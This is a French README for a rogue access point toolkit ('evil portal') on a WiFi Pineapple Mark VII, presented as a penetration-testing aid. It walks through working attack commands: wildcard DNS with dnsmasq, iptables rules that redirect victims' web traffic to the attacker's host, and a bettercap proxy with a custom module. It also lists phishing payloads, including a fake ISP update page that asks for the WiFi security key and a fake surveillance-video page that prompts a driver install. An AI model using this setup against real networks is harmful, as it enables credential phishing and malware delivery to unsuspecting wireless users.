
Boîte à outils pour point d'accès malveillant destiné aux tests de pénétration WiFi, déploiement de charges utiles de phishing par portail malveillant pour capturer des identifiants et mener des attaques d'ingénierie sociale sur les réseaux sans fil.
Auteur:: TW-D
Version:: 1.0.0
Droits d'auteur:: Copyright (c) 2024 TW-D
Licence:: Distribué sous les mêmes termes que Ruby
Nécessite:: PHP >= 8.1, Ruby >= 2.7.0p0 et WiFi Pineapple Mark VII 2.1.3-stable
Installation (Distributions Linux basées sur Debian)::
sudo apt-get install php8.1-cli php8.1-curl
sudo apt-get install build-essential ruby ruby-dev libpcap-dev
sudo gem install sorted_set bettercap
Un portail malveillant est une technique utilisée pour tromper les utilisateurs d'un réseau Wi-Fi en les redirigeant vers une page web malveillante au lieu de la page d'authentification ou d'accueil attendue.
Remarque : "Issues" et "Pull Requests" sont les bienvenus.
| Système d'exploitation avec/sans navigateur web | Type de notification |
|---|---|
| Ubuntu 22.04 | Aucun |
| Android 8.0.0 | Système |
| Microsoft Windows 10 | Aucun |
| Raspberry Pi bookworm | Aucun |
| Ubuntu 22.04 avec Mozilla Firefox | Alerte |
| Microsoft Windows 10 avec Mozilla Firefox | Alerte |
| Raspberry Pi bookworm avec Mozilla Firefox | Alerte |
Connectez l'Ananas WiFi à votre ordinateur via le câble USB-C.
Paramètres > Réseau > Mode Client Sans Fil : L'interface wlan2 doit être déconnectée.
hacker@hacker-computer:~$ ifconfig enx
enx: [...]
inet 172.16.42.100 netmask 255.255.255.0 broadcast 172.16.42.255
[...]
(optional)
hacker@hacker-computer:~$ sudo nmap -sT -sU -p 53,5353 -e enx 172.16.42.1
[...]
PORT STATE SERVICE
53/tcp open domain
5353/tcp closed mdns
53/udp open domain
5353/udp closed zeroconf
[...]
hacker@hacker-computer:~$ ssh [email protected]
root@mk7:~# dnsmasq --address=/#/172.16.42.1 --no-hosts --interface=br-lan --port=5353 --no-resolv
root@mk7:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto tcp --dport 53 --jump DNAT --table nat --to-destination 172.16.42.1:5353
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto udp --dport 53 --jump DNAT --table nat --to-destination 172.16.42.1:5353
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto tcp --dport 80 --jump DNAT --table nat --to-destination 172.16.42.100:8080
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto tcp --dport 443 --jump DNAT --table nat --to-destination 172.16.42.100:8000
root@mk7:~# iptables --append POSTROUTING --jump MASQUERADE --table nat
root@mk7:~# exit
(optional)
hacker@hacker-computer:~$ sudo nmap -sT -sU -p 53,5353 -e enx 172.16.42.1
[...]
PORT STATE SERVICE
53/tcp open domain
5353/tcp open mdns
53/udp open domain
5353/udp open zeroconf
[...]
(optional)
hacker@hacker-computer:~$ dig @172.16.42.1 -p 53 www.google.com
[...]
;; ANSWER SECTION:
www.google.com. 0 IN A 172.16.42.1
[...]
(optional)
hacker@hacker-computer:~$ dig @172.16.42.1 -p 5353 www.google.com
[...]
;; ANSWER SECTION:
www.google.com. 0 IN A 172.16.42.1
[...]
hacker@hacker-computer:~$ cd ./WiFi-Pineapple-MK7_Evil-Portal/
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ php -S 172.16.42.100:8000
hacker@hacker-computer:~$ cd ./WiFi-Pineapple-MK7_Evil-Portal/
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ sudo "${BASH}" -c "echo 0 > /proc/sys/net/ipv4/ip_forward"
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ sudo "${BASH}" -c "echo 0 > /proc/sys/net/ipv6/conf/all/forwarding"
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ sudo bettercap \
--interface enx \
--gateway 172.16.42.1 \
--no-discovery \
--log ./logs/bettercap.log \
--silent \
--no-spoofing \
--proxy \
--proxy-port 8080 \
--allow-local-connections \
--no-sslstrip \
--no-http-logs \
--proxy-module ./EvilPortal.rb \
--redirect-url http://172.16.42.100:8000/
hacker@hacker-computer:~$ curl --head --interface enx "http://neverssl.com/"
HTTP/1.1 302 Found
[...]
Location: http://172.16.42.100:8000/
Cache-Control: max-age=0, private, must-revalidate
hacker@hacker-computer:~$ curl --head --insecure --interface enx "https://www.google.com/"
curl: (35) error:0A000126:SSL routines::unexpected eof while reading
hacker@hacker-computer:~$ exit
Dans le répertoire "./payloads/", vous trouverez :
| DÉVELOPPEMENT | Auteur | Description | Comment utiliser |
|---|---|---|---|
| skeleton.html | TW-D | Charge utile vide destinée au développement. | Documentation |
| EXÉCUTION | Auteur | Description | Comment utiliser |
|---|---|---|---|
| web-camera.html | TW-D | Simule une fausse vidéo de surveillance et demande l'installation d'un pilote pour son fonctionnement. | Documentation |

| PHISHING | Auteur | Description | Comment utiliser |
|---|---|---|---|
| wifi_security-key.html | TW-D | Simule une fausse mise à jour de l'équipement Internet et demande la clé de sécurité WiFi pour continuer. | Documentation |
